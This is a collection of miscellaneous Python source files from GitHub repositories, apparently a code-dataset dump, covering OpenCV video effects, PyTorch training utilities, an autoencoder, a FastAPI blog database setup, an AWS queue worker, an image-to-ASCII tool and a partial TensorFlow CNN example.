string: str, start: int, end: int):\n return str(string)[int(start): int(end)]\n\n\nstrings_blocks = 
collect_blocks(__name__)\n","repo_name":"lDisciple/pyblock","sub_path":"engine/plugins/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28000235597","text":"from src.ObjectsStateHandler import ObjectsStateHandler\nfrom src.lib.lib import INPUT_VIDEO_LOC\nfrom src.lib.lib import SAVING_OUTPUT_VIDEO_LOC\nimport cv2\n\n\n# get video mode from user\n# 1 - webcam\n# 2 - offline video location\ndef __get_video_mode():\n user_selected_mode = int(input(\"select your mode :\\n1 - webcam\\n2 - dataset video\\n\"))\n return user_selected_mode\n\n\n# create video writer to write the whole process with\ndef __create_video_writer():\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n # we know that the frame size width is 640 and height is 480\n # ------important reminder------- if the frame size changes, you must update 640, 480 in the following line too\n return cv2.VideoWriter(SAVING_OUTPUT_VIDEO_LOC, fourcc, 20.0, (640, 480))\n\n\ndef main():\n # determine user desired mode\n user_selected_mode = __get_video_mode()\n\n # this line works around an OpenCV bug that I don't fully understand :D\n cv2.ocl.setUseOpenCL(False)\n\n # initiate falling objects state handler\n state = ObjectsStateHandler()\n # capture from webcam or from an offline video file\n if user_selected_mode == 1:\n cap = cv2.VideoCapture(0)\n else:\n cap = cv2.VideoCapture(INPUT_VIDEO_LOC)\n\n # get video writer in 640*480 size (matches frame size)\n video_writer = __create_video_writer()\n\n # it'll count up to the frames limit to add the effect\n # after adding the effect it'll start counting again\n frames_counter = 0\n frames_limit = 1\n # foreground background separator\n fgbg = cv2.createBackgroundSubtractorKNN(history=500)\n # fgbg = cv2.createBackgroundSubtractorMOG2(varThreshold=4, history=1000)\n # in webcam mode it will loop until the user gets tired :D\n # in offline mode it will loop until the video is finished\n while True:\n # read current frame\n ret, frame = cap.read()\n if not ret:\n break\n # apply foreground background subtraction\n fg_mask = fgbg.apply(frame)\n # use the counter to update object locations only every other frame for better performance (less lag)\n if frames_counter == frames_limit:\n # update frame state with falling objects using foreground mask\n state.update(frame=frame, foreground_mask=fg_mask)\n frames_counter = 0\n else:\n state.draw_objects(frame=frame)\n\n cv2.imshow(\"snowish :D\", frame) # show image with snowflakes and raindrop effect on it :D\n video_writer.write(frame)\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n # count up to the frames limit\n frames_counter += 1\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AradAshrafi/Motion-Detection-And-Object-Tracking","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20139493387","text":"import copy\nimport os\nimport time\nimport torch\nfrom torch import nn\n\nimport forge.experiment_tools as fet\nfrom math import cos, pi, sin\n\n# from matplotlib.lines import Line2D\n# import matplotlib.pyplot as plt\n# import numpy as np\n\n\ndef rotate(X, angle):\n rotation_matrix = torch.tensor(\n [[cos(angle), -sin(angle)], [sin(angle), cos(angle)]]\n )\n rotation = (\n 
rotation_matrix.unsqueeze(0).unsqueeze(0).repeat(X.shape[0], X.shape[1], 1, 1)\n )\n out = (\n rotation.view(-1, 2, 2)\n .bmm(X.unsqueeze(3).view(-1, 2, 1))\n .view(X.shape[0], X.shape[1], 2, 1)\n .squeeze(3)\n )\n return out\n\n\ndef parse_reports(report_dict):\n return {\n k: v.item() if len(v.shape) == 0 else v.detach().clone()\n for k, v in report_dict.items()\n }\n\n\ndef parse_reports_cpu(report_dict):\n return {\n k: v.item() if len(v.shape) == 0 else v.clone().cpu().numpy()\n for k, v in report_dict.items()\n }\n\n\ndef print_reports(report_dict, start_time, epoch, batch_idx, num_epochs, prefix=\"\"):\n\n reports = [\"{}:{:.06f}\".format(*item) for item in report_dict.items()]\n report_string = \", \".join(reports)\n if prefix:\n print(prefix, end=\": \")\n\n print(\n \"time {:.03f}, epoch: {} [{} / {}]: {}\".format(\n time.time() - start_time,\n epoch,\n batch_idx,\n num_epochs,\n report_string,\n )\n )\n\n\ndef log_tensorboard(writer, iteration, report_dict, prefix=\"\"):\n if prefix and not prefix.endswith(\"/\"):\n prefix = prefix + \"/\"\n\n for k, v in report_dict.items():\n writer.add_scalar(prefix + k, v, iteration)\n\n\ndef log_reports(reports_all, iteration, reports, prefix=\"\"):\n reports[\"iteration\"] = iteration\n if prefix != \"\":\n for d in reports.keys():\n reports_all[prefix + \"_\" + d].append(reports[d])\n else:\n for d in reports.keys():\n reports_all[d].append(reports[d])\n\n return reports_all\n\n\ndef get_checkpoint_iter(checkpoint_iter, checkpoint_dir):\n if checkpoint_iter != -1:\n return checkpoint_iter\n\n return max(fet.find_model_files(checkpoint_dir).keys())\n\n\ndef load_checkpoint(checkpoint_path, model, opt=None, lr_sched=None):\n print(\"Restoring checkpoint from '{}'\".format(checkpoint_path))\n checkpoint = torch.load(checkpoint_path)\n # Restore model\n model.load_state_dict(checkpoint[\"model_state_dict\"])\n\n # Restore optimizer\n if opt is not None:\n opt.load_state_dict(checkpoint[\"model_optimizer_state_dict\"])\n\n # Restore LR schedule\n if lr_sched is not None:\n lr_sched.load_state_dict(checkpoint[\"model_lr_sched_state_dict\"])\n\n # Update starting epoch\n if checkpoint[\"epoch\"] == \"final\":\n checkpoint[\"epoch\"] = 0\n start_epoch = checkpoint[\"epoch\"] + 1\n\n if \"loss\" in checkpoint: # checkpoint is a dict; hasattr() here would always be False\n loss = checkpoint[\"loss\"]\n else:\n loss = None\n\n return start_epoch, loss\n\n\ndef save_checkpoint(checkpoint_name, epoch, model, opt, lr_sched=None, loss=None):\n epoch_ckpt_file = \"{}-{}\".format(checkpoint_name, epoch)\n print(\"Saving model training checkpoint to {}\".format(epoch_ckpt_file))\n\n state = {\n \"epoch\": epoch,\n \"model_state_dict\": model.state_dict(),\n \"model_optimizer_state_dict\": opt.state_dict(),\n \"model_lr_sched_state_dict\": lr_sched.state_dict()\n if lr_sched is not None\n else None,\n }\n\n if loss is not None:\n state[\"loss\"] = loss\n\n torch.save(state, epoch_ckpt_file)\n return epoch_ckpt_file\n\n\ndef delete_checkpoint(checkpoint_name, epoch):\n epoch_ckpt_file = \"{}-{}\".format(checkpoint_name, epoch)\n os.remove(epoch_ckpt_file)\n print(\"Deleted checkpoint file at {}\".format(epoch_ckpt_file))\n\n\nclass ExponentialMovingAverage(nn.Module):\n def __init__(self, alpha=0.99, initial_value=0.0, debias=False):\n super(ExponentialMovingAverage, self).__init__()\n\n self.alpha = alpha\n self.initial_value = initial_value\n self.debias = debias\n if self.debias and self.initial_value != 0:\n raise NotImplementedError(\n \"Debiasing is implemented only for initial_value==0.\"\n )\n\n 
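# --- editor's sketch (added for illustration; not part of the original train_tools.py) ---
# A minimal round trip through the save_checkpoint/load_checkpoint helpers above,
# using a toy model; the "./ckpt" prefix is hypothetical. With the dict-membership
# fix above, the saved loss survives the round trip.
def _checkpoint_round_trip_demo():
    import torch
    from torch import nn
    model = nn.Linear(4, 2)
    opt = torch.optim.Adam(model.parameters())
    path = save_checkpoint("./ckpt", epoch=3, model=model, opt=opt, loss=0.5)
    start_epoch, loss = load_checkpoint(path, model, opt)
    assert start_epoch == 4 and loss == 0.5
    delete_checkpoint("./ckpt", 3)
# --- end sketch ---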
self.ema = None\n self.alpha_power = 1.0\n\n def forward(self, x):\n \"\"\"x can be a scalar, a tensor, or a dict of scalars or tensors.\"\"\"\n\n if self.ema is None:\n if isinstance(x, dict):\n self.ema = x.__class__({k: self.initial_value for k in x})\n else:\n self.ema = self.initial_value\n\n am1 = 1.0 - self.alpha\n if isinstance(x, dict):\n for k, v in x.items():\n self.ema[k] = self.ema[k] * self.alpha + v * am1\n ema = copy.deepcopy(self.ema)\n else:\n self.ema = self.ema * self.alpha + x * am1\n ema = self.ema\n\n if self.debias and self.alpha_power > 0.0:\n self.alpha_power *= self.alpha\n apm1 = 1.0 - self.alpha_power\n\n if isinstance(ema, dict):\n for k in ema:\n ema[k] /= apm1\n else:\n ema /= apm1\n\n return ema\n\n\ndef nested_to(x, device, dtype):\n \"\"\" Move a list of list of... of tensors to device\"\"\"\n try:\n x = x.to(device=device, dtype=dtype)\n return x\n except AttributeError:\n assert isinstance(x, (list, tuple))\n x = type(x)(nested_to(xx, device=device, dtype=dtype) for xx in x)\n return x\n\n\ndef param_count(model):\n total_params = sum(p.numel() for p in model.parameters())\n return total_params\n\n\ndef get_component(module, description):\n \"This is specifically to be used with module = model.predictor.net for eqv_transformer.\"\n idx = description[0]\n attrs = description[1]\n module = module[idx]\n for attr in attrs:\n module = getattr(module, attr)\n return module\n\n\ndef get_average_norm(module, p=1):\n norm = 0\n for param in module.parameters():\n norm += param.norm(p)\n return norm / param_count(module)\n\n\ndef parameter_analysis(model):\n for n, p in model.named_parameters():\n print(\n \"{:>100} {:>20}Mb {:>20}\".format(\n n, p.numel() * 4 / (1024 ** 2), p.type()\n )\n )\n print(\n \"{:>100} {:>20}Mb\".format(\n \"total parameters\",\n sum(p.numel() for p in model.parameters()) * 4 / (1024 ** 2),\n )\n )\n","repo_name":"oxcsml/lie-transformer","sub_path":"eqv_transformer/train_tools.py","file_name":"train_tools.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"34012772849","text":"import sys\nimport torch\nimport torch.nn as nn\n\nencoder_config = {\n 'base': [3, 'down', 32, 'down', 64, 'down', 128, 'down', 256, 'down', 512],\n 'A': [3, 'down', 32, 'down', 64, 'down', 128, 'down', 128, 'down', 128],\n 'B': [3, 'down', 32, 'down', 64, 'down', 64, 'down', 64, 'down', 64],\n 'C': [3, 'down', 32, 'down', 32, 'down', 32, 'down', 32, 'down', 32],\n 'D': [3, 'down', 512, 'down', 256, 'down', 128, 'down', 64, 'down', 32],\n}\n\ndecoder_config = {\n 'base':[512, 'up', 256, 'up', 128, 'up', 64, 'up', 32, 'up', 3],\n 'A': [128, 'up', 128, 'up', 128, 'up', 64, 'up', 32, 'up', 3],\n 'B': [64, 'up', 64, 'up', 64, 'up', 64, 'up', 32, 'up', 3],\n 'C': [32, 'up', 32, 'up', 32, 'up', 32, 'up', 32, 'up', 3],\n 'D': [32, 'up', 64, 'up', 128, 'up', 256, 'up', 512, 'up', 3],\n}\n\nclass AutoEncoder(nn.Module):\n def __init__(self, E_symbol, D_symbol):\n super().__init__()\n self.encoder = Encoder(encoder_config[E_symbol])\n self.decoder = Decoder(decoder_config[D_symbol])\n\n def forward(self, inputs):\n vectors = self.encoder(inputs)\n images = self.decoder(vectors)\n return images\n\n def encode(self, inputs):\n vectors = self.encoder(inputs)\n return vectors\n\n def decode(self, inputs):\n images = self.decoder(inputs)\n return images\n\nclass Encoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n layer_count = int((len(config) - 1)/2)\n 
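# --- editor's sketch (added for illustration; not part of the original model.py) ---
# Each encoder config applies five stride-2 convolutions, so a 32x32 input collapses
# to 1x1 spatially and the flattened latent size equals the config's last channel
# count (512 for 'base', 32 for 'C'). A quick shape check under that assumption:
def _encoder_latent_dim_demo():
    import torch
    enc = Encoder(encoder_config['base'])
    z = enc(torch.zeros(2, 3, 32, 32))
    assert z.shape == (2, 512)
# --- end sketch ---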
layers = []\n for i in range(layer_count):\n in_c = config[2*i]\n conv_type = config[2*i + 1]\n out_c = config[2*i + 2]\n if conv_type == 'conv':\n layers.append(nn.Conv2d(in_c, out_c, kernel_size= 3, stride= 1, padding= 1))\n elif conv_type == 'down':\n layers.append(nn.Conv2d(in_c, out_c, kernel_size= 4, stride= 2, padding= 1))\n layers += [nn.BatchNorm2d(out_c), nn.ReLU(inplace= True)]\n\n self.net = nn.Sequential(*layers)\n\n def forward(self, inputs):\n out = self.net(inputs)\n out = out.view(out.size(0), -1)\n return out\n\nclass Decoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n layer_count = int((len(config) - 1)/2)\n layers = []\n for i in range(layer_count):\n in_c = config[2*i]\n conv_type = config[2*i + 1]\n out_c = config[2*i + 2]\n if conv_type == 'conv':\n layers.append(nn.Conv2d(in_c, out_c, kernel_size= 3, stride= 1, padding= 1))\n elif conv_type == 'up':\n layers.append(nn.ConvTranspose2d(in_c, out_c, kernel_size= 4, stride= 2, padding= 1))\n layers += [nn.BatchNorm2d(out_c), nn.ReLU(inplace= True)]\n \n layers[-1] = nn.Sigmoid()\n self.net = nn.Sequential(*layers)\n\n def forward(self, inputs):\n size = inputs.size()\n inputs = inputs.view(size[0], size[1], 1, 1)\n out = self.net(inputs)\n return out\n\ndef test():\n batch_size = 8\n imgs = torch.zeros(batch_size, 3, 32, 32)\n model = AutoEncoder(sys.argv[1], sys.argv[2])\n img_out = model(imgs)\n print(img_out.size())\n\ndef test2():\n img = torch.zeros(1, 3, 1, 1)\n deconv = nn.ConvTranspose2d(3, 32, kernel_size= 4, stride= 2, padding= 1)\n out = deconv(img)\n print(out.size())\n\nif __name__ == '__main__':\n test()\n","repo_name":"zhihao-lin/ML2019SPRING","sub_path":"hw7/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40307184546","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom fastapi import FastAPI, Depends\nfrom sqlalchemy.ext.declarative import declarative_base\n\nDATABASE_URL = \"postgresql://postgres:12345@localhost/Blog\"\n\nengine = create_engine(DATABASE_URL)\n\nsessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\nBase = declarative_base()\n\nrouter = FastAPI(debug=True, title=\"Blog\", description=\"\"\"\n In this Blog,\n Users \n 1. User can SignUp\n 2. User can Login to get Access Token\n 3. 
User can Update their details \n Blogs\n 1.User can get all blogs.\n 2.User can get a single blog.\n 3.User can post a blog.\n 4.User can update a blog.\n 5.User can delete a blog.\n \n\"\"\")\n\ndef get_session():\n session = sessionLocal()\n try:\n yield session\n finally:\n session.close()","repo_name":"M-an-o-j/fastapi_blog","sub_path":"configuration/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74254350887","text":"try:\n import urlparse\nexcept:\n import urllib.parse as urlparse\nimport json\n\nfrom pymads.sources.dns import MultiDNS\n\nfrom djdns.resolver import ResolverWrapper\n\nGLOBAL_MDNS = MultiDNS()\n\nclass DocLoader(object):\n '''\n Loads a page based on URI.\n '''\n\n def __init__(self, register_defaults = True, **kwargs):\n self.loaders = {}\n if register_defaults:\n self.register_defaults()\n self.register_dict(kwargs)\n\n def load(self, uri):\n parsed_uri = urlparse.urlparse(uri)\n scheme = parsed_uri.scheme\n\n if scheme in self.loaders:\n return self.loaders[scheme](parsed_uri)\n else:\n raise KeyError(\"No loader registered for scheme %r\" % scheme)\n\n def register_dict(self, table):\n self.loaders.update(table)\n\n def register(self, name, callback):\n self.loaders[name] = callback\n\n def register_defaults(self):\n self.register_dict({\n 'dns' : dns_loader,\n 'file' : file_loader,\n '' : file_loader,\n })\n\ndef file_loader(parsed_uri):\n return json.load(open(parsed_uri.path))\n\ndef dns_loader(parsed_uri):\n hostname = parsed_uri.hostname\n port = int(parsed_uri.port or 53)\n\n server_addr = (hostname, port)\n\n return ResolverWrapper(\n GLOBAL_MDNS.get_source(server_addr)\n )\n","repo_name":"campadrenalin/python-djdns","sub_path":"djdns/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"53"} +{"seq_id":"33591908944","text":"# //List\npet_name = [\"Rose\", \"Meow\", \"Dew\", \"kude\", \"Doggy\", \"harre\"]\n\n# print(pet_name[0])\n# print(pet_name[2:6])\n# print(pet_name.reverse())\n# print(pet_name[0].upper())\n# print(pet_name[0].title())\n# pet_name.append(\"AStro\")\n# pet_name.insert(0, \"kuku\")\n# pet_name.pop()\n# print(pet_name)\n# pet_name.clear()\n# print(pet_name)\n\n# TUPLES\n# pet_age = (1, 2, 2, 3, 4, 5, 6, 7, 8, 9, 10)\n# print(pet_age.count(2))\n# print(pet_age)\n\n# for i in range(0, 10):\n# print(i)\n\n# SETS\n# pet_food = {\"nyama\", \"kachumba\", \"liku\", \"liku\"}\n# print(pet_food)\n\n# DICTIONAR\npet_info = {\n \"name\": \"luku\",\n \"age\": 5,\n \"breed\": \"domestic long\"\n}\n# pets = dict(name=\"kudez\", age=25, breed=\"snko\")\n# print(pet_info[\"age\"])\n# print(pet_info.get(\"laugh\", \"Attribute not found\"))\n\n# FUNCTIONS\n\n\ndef pet_list(list):\n for pet in list:\n print(pet)\n\n\npet_list(pet_name)\n","repo_name":"malise5/Python","sub_path":"orm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74571769127","text":"from Date import *\n\nfile = 'birthdays.txt'\nfile = open(file)\n\nbirth = []\nfor i in file:\n birth.append(i.strip().split(\" \"))\n\n\nfor j in range(len(birth)):\n new = Date(birth[j][0], birth[j][1], birth[j][2])\n birth[j] = new\n \n \n\n \n \n\nprint(min(birth))\nprint(max(birth))\n\nmonths = []\nfor i in birth:\n 
months.append(i.month)\nj = max(set(months), key=months.count)\nprint(j)\nprint(month_names[int(j)])","repo_name":"sriyuthsagi/CSCI-1100-Computer-Science-I","sub_path":"Labs/Lab 9/Lab_9_3.py","file_name":"Lab_9_3.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9779404925","text":"\"\"\"\nConfiguration for pytest.\n\"\"\"\n\nimport os\nfrom dataclasses import dataclass\nfrom unittest.mock import Mock\n\nimport pytest\nfrom slack_bolt import App\nfrom slack_sdk import WebClient\n\nfrom ebmbot import settings\n\nfrom .mock_web_api_server import cleanup_mock_web_api_server, setup_mock_web_api_server\n\n\npytest.register_assert_rewrite(\"tests.assertions\")\n\n\n@pytest.fixture(autouse=True)\ndef reset_db():\n try:\n os.remove(settings.DB_PATH)\n except FileNotFoundError:\n pass\n\n\n@dataclass\nclass MockRecordingClient:\n client: WebClient\n recorder: Mock\n\n\n@dataclass\nclass MockRecordingApp:\n app: App\n recorder: Mock\n\n\n@pytest.fixture\ndef mock_client():\n test_recorder = Mock()\n setup_mock_web_api_server(test_recorder)\n mock_api_server_base_url = \"http://localhost:8888\"\n\n yield MockRecordingClient(\n client=WebClient(\n token=\"xoxb-valid\",\n base_url=mock_api_server_base_url,\n ),\n recorder=test_recorder,\n )\n cleanup_mock_web_api_server(test_recorder)\n\n\n@pytest.fixture\ndef mock_app(mock_client):\n yield MockRecordingApp(\n app=App(client=mock_client.client, raise_error_for_unhandled_request=True),\n recorder=mock_client.recorder,\n )\n","repo_name":"ebmdatalab/ebmbot","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20007979288","text":"from signal import signal, SIGINT\nimport boto3\nimport json\nimport requests\nimport logging\nimport time\nfrom subprocess import Popen, PIPE, STDOUT\nimport sys\n\nfrom credentials import get_secret\nfrom rds_handler import SqlHandler\nfrom helper import get_message_from_queue, get_etm_curves, build_tarball, save_etm_curves_to_s3, push_message_to_next_queue, delete_message_from_queue\nfrom config import *\n\nif logging.getLogger().hasHandlers():\n logging.getLogger().setLevel(logging.INFO)\n LOGGER = logging.getLogger(__name__)\nelse:\n LOG_FORMAT = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '\n '-35s %(lineno) -5d: %(message)s')\n LOGGER = logging.getLogger(__name__)\n logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)\n\n\ndef handler(signal_received, frame):\n print('SIGINT or CTRL-C detected. 
Exiting gracefully')\n sys.exit(0)\n\n\nif __name__ == '__main__':\n total_timeout_time = 0\n db_secret = get_secret(\"prod/gridmaster/overview/readwrite\")\n if ENVIRONMENT == 'local':\n db_secret['host'] = 'host.docker.internal'\n sql_handler = SqlHandler(db_secret)\n LOGGER.info('starting flask')\n proc = Popen(['pipenv', 'run', 'flask', 'run', '--host=0.0.0.0'], stdout=PIPE, stderr=STDOUT, cwd=FLASK_CWD)\n signal(SIGINT, handler)\n time.sleep(3)\n s3_client = boto3.client('s3')\n url = \"http://localhost:5000/api/v1/create_with_context/\"\n with open('2021_hic_description.esdl', 'r') as f:\n start_esdl = f.read()\n while True:\n body, receipt_handle = get_message_from_queue(ETM_QUEUE_URL)\n if not body:\n # There is no message in the queue, wait and try again\n LOGGER.info('Queue is empty, waiting for 5 seconds')\n time.sleep(5)\n if total_timeout_time > CONTAINER_TIMEOUT:\n # If no messages received for timeout limit, exit container/loop\n LOGGER.info('Container timeout exceeded, shutting down')\n RUNNING = False\n break\n total_timeout_time += 5\n continue\n total_timeout_time = 0\n logging.info('starting ETM scenario creation for scenarioId: {}'.format(body['scenarioId']))\n response = s3_client.get_object(\n Bucket=BUCKET_NAME,\n Key=body['baseEsdlLocation']\n )\n base_esdl = response['Body'].read().decode('utf-8')\n # Load ETM context scenario ID from S3\n response = s3_client.get_object(\n Bucket=BUCKET_NAME,\n Key=body['contextScenarioLocation']\n )\n context_scenario = json.loads(response['Body'].read().decode('utf-8'))\n # call local ETM API\n payload = requests.urllib3.request.urlencode({'energy_system_start_situation': start_esdl.encode('utf-8'),\n 'energy_system_end_situation': base_esdl.encode('utf-8'),\n 'scenario_id': context_scenario['contextScenario']})\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n try:\n etm_response = requests.request(\"POST\", url, headers=headers, data=payload, timeout=45)\n if etm_response.status_code == 422:\n LOGGER.error('ETM returned 422 for scenarioId {}, with message: {}'.format(\n body['scenarioId'], etm_response.text))\n delete_message_from_queue(ETM_QUEUE_URL, receipt_handle)\n continue\n elif etm_response.status_code == 429:\n LOGGER.error('ETM returned 429 for scenarioId {}, with message: {}, returning message to queue'.format(\n body['scenarioId'], etm_response.text))\n continue\n elif etm_response.status_code != 200:\n LOGGER.error('ETM API returned an error, exiting function. 
Error code: {}, with message: {}'.format(\n                    etm_response.status_code, etm_response.text))\n                continue\n        except requests.exceptions.ConnectionError as ex:\n            LOGGER.error(ex)\n            continue\n        except requests.exceptions.ReadTimeout as ex:\n            LOGGER.error(ex)\n            logging.error('Failed ETM scenario creation for scenarioId: {} due to timeout, shutting down'.format(body['scenarioId']))\n            break\n        LOGGER.info('ETM etm_response is {} for scenarioId {}'.format(etm_response.status_code, body['scenarioId']))\n        etm_scenario_id = json.loads(etm_response.text)['scenario_id']\n        etm_curves = get_etm_curves(etm_scenario_id)\n        tarball = build_tarball(etm_curves)\n        s3_key = save_etm_curves_to_s3(body, tarball)\n\n        body['calculationState'] = 'etmProcessed'\n        body['etmScenarioId'] = etm_scenario_id\n        body['etmResultLocation'] = s3_key\n\n        LOGGER.info('Successfully created ETM scenario with scenarioId: {}'.format(body['scenarioId']))\n        with open('sql/update_scenario.sql', 'r') as f:\n            sql_stmt = f.read()\n        sql_handler.update_scenario_state(sql_stmt, [body])\n        delete_message_from_queue(ETM_QUEUE_URL, receipt_handle)\n        push_message_to_next_queue(ESDL_UPDATER_QUEUE_URL, body)\n\n    proc.terminate()\n    sys.exit()\n","repo_name":"GridMaster2022/etm-api","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21833636487","text":"from typing import List, Tuple\nfrom PIL import Image, ImageFont, ImageDraw\n\nclass Img2Text:\n    __CHARS = \"\"\"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ \"\"\"\n    __FONT = ImageFont.truetype(\"arial.ttf\", 20)\n    def __init__(self):\n        m = sorted([(self._mean_char_pixel(c), c) for c in self.__CHARS])\n        self.chars = [c for _, c in m]\n        self.ws = [(w - m[0][0]) / (m[-1][0] - m[0][0]) for w, _ in m]\n\n    def _mean_char_pixel(self, char: str) -> float:\n        img = Image.new('L', self.__FONT.getbbox(char)[2:], color=255)\n        draw = ImageDraw.Draw(img)\n        draw.text((0, 0), char, font=self.__FONT, fill=0)\n        pixels = img.getdata()\n        return -sum(pixels) // len(pixels)\n\n    def render(self, img, new_size: Tuple[int, int]) -> str:\n        rimg = img.resize(new_size, Image.HAMMING)\n        pixels = self._norm_img(rimg.getdata())\n        chars = [self._find(p) for p in pixels]\n        batches = [chars[i:i+rimg.size[0]] for i in range(0, len(chars), rimg.size[0])]\n        return \"\\n\".join((\"\".join(b) for b in batches))\n    \n    def _norm_img(self, pixels: List[int]) -> List[float]:\n        min_val, max_val = min(pixels), max(pixels)\n        return [(p - min_val) / (max_val - min_val) for p in pixels]\n\n    def _find(self, pixel: float) -> str:\n        l, h = 0, len(self.ws) -1\n        while l <= h:\n            mid = (h + l) // 2\n            if pixel < self.ws[mid]: h = mid - 1\n            elif pixel > self.ws[mid]: l = mid + 1\n            else: return self.chars[mid]\n        return self.chars[l] if (self.ws[l] - pixel) < (pixel - self.ws[h]) else self.chars[h]\n\n\nif __name__ == \"__main__\":\n    img = Image.open(\"badger.jpg\").convert(\"L\")\n    img2Text = Img2Text()\n    print(img2Text.render(img, (128, 64)))\n\n","repo_name":"KucicM/img2ascii","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17325457418","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn import datasets\nfrom tensorflow.python.framework import ops\nfrom sklearn.preprocessing import OneHotEncoder\n\niris = 
datasets.load_iris()\n#print(iris.data)\n#print(iris.target)\nops.reset_default_graph()\nconv_size = 2\nstride_size = 1\nmaxpool_size = 2\n\n# Create graph session (build the initial graph structure)\nops.reset_default_graph()\nsess = tf.Session()\n#placeholder\n\ndef generatebatch(X,Y,n_examples, batch_size):\n    for batch_i in range(n_examples // batch_size):\n        start = batch_i*batch_size\n        end = start + batch_size\n        batch_xs = X[start:end]\n        batch_ys = Y[start:end]\n        yield batch_xs, batch_ys # yield one batch at a time\n\n# --------Convolution--------\ndef conv_layer_1d(input_1d, my_filter, stride):\n    # TensorFlow's 'conv2d()' function only works with 4D arrays:\n    # [batch, height, width, channels], we have 1 batch, and\n    # width = 1, but height = the length of the input, and 1 channel.\n    # So next we create the 4D array by inserting dimension 1's.\n    # Handling the tensor dimensions is critical: convolution ops in TensorFlow\n    # only support 4D tensors, so the data has to be manually padded out to 4D, e.g. [1,1,25,1]\n    #input_2d = tf.expand_dims(input_1d, 0)\n    input_3d = tf.expand_dims(input_1d, 1)\n    input_4d = tf.expand_dims(input_3d, 3)\n    # Perform convolution with stride = 1, if we wanted to increase the stride,\n    # to say '2', then strides=[1,1,2,1]\n    convolution_output = tf.nn.conv2d(input_4d, filter=my_filter, strides=[1, 1, stride, 1], padding=\"VALID\")\n    # Get rid of extra dimensions (drop the size-1 axes, keep only the values)\n    conv_output_1d = tf.squeeze(convolution_output)\n    return (conv_output_1d)\n\n# --------Activation--------\ndef activation(input_1d):\n    return (tf.nn.relu(input_1d))\n\n\n# --------Fully Connected--------\ndef fully_connected(input_layer,num_outputs):\n\n    # First we find the needed shape of the multiplication weight matrix:\n    # The dimension will be (length of input) by (num_outputs)\n\n    weight_shape = tf.squeeze(tf.stack([[tf.shape(input_layer)[0]], [tf.shape(input_layer)[1]],[num_outputs]]))\n\n    #weight_shape = [num_outputs]\n    # squeeze removes dimensions of size 1 while preserving the data.\n    # Initialize the weight\n    input_flat = tf.reshape(input_layer, [-1, 2])\n    weight = tf.random_normal([2,3], stddev=0.1)\n    #weight = tf.random_normal(weight_shape, stddev=0.1)\n    #print(sess.run(weight))\n    # Initialize the bias\n    bias = tf.random_normal(shape=[num_outputs])\n    # Make the 1D input array into a 2D array for matrix multiplication\n    input_layer_2d = tf.expand_dims(input_layer, 2)\n    # Perform the matrix multiplication and add the bias\n\n    full_output = tf.add(tf.matmul(input_flat, weight), bias)\n    softmax_output = tf.nn.softmax(full_output)\n    # Get rid of extra dimensions, keeping only the data\n    full_output_1d = tf.squeeze(full_output)\n    return (softmax_output)\n\n# --------Max Pool--------\ndef max_pool(input_1d, width, stride):\n    # Just like 'conv2d()' above, max_pool() works with 4D arrays.\n    # [batch_size=1, width=1, height=num_input, channels=1]\n    # Since squeeze was used to reduce the dimensions of the convolution output,\n    # the input has to be expanded back to 4D for the max-pooling layer here\n    #input_2d = tf.expand_dims(input_1d, 0)\n    input_3d = tf.expand_dims(input_1d, 1)\n    input_4d = tf.expand_dims(input_3d, 3)\n    # Perform the max pooling with strides = [1,1,1,1]\n    # If we wanted to increase the stride on our data dimension, say by\n    # a factor of '2', we put strides = [1, 1, 2, 1]\n    # We will also need to specify the width of the max-window ('width')\n\n    pool_output = tf.nn.max_pool(input_4d, ksize=[1, 1, width, 1],\n                                 strides=[1, 1, stride, 1],\n                                 padding='VALID')\n    # Get rid of extra dimensions\n    pool_output_1d = tf.squeeze(pool_output)\n    return (pool_output_1d)\n\n# Input layer\n\ntf_X = tf.placeholder(tf.float32,[None,4])\ntf_Y = 